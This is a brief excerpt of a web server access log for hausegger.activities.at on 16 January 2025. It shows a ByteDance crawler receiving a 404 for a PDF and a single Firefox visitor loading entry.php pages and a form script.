156.59.198.136 - - [16/Jan/2025:10:50:02 +0100] "GET /docs/contadino/2017/RE17-000031.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.49 - - [16/Jan/2025:10:50:57 +0100] "GET /entry.php?id=10271&&ser=20995 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=20935" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:50:57 +0100] "GET /gui/javascript/form_form.js?1737021057 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=20995" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:51:58 +0100] "GET /entry.php?id=10271&&ser=21057 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=20995" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
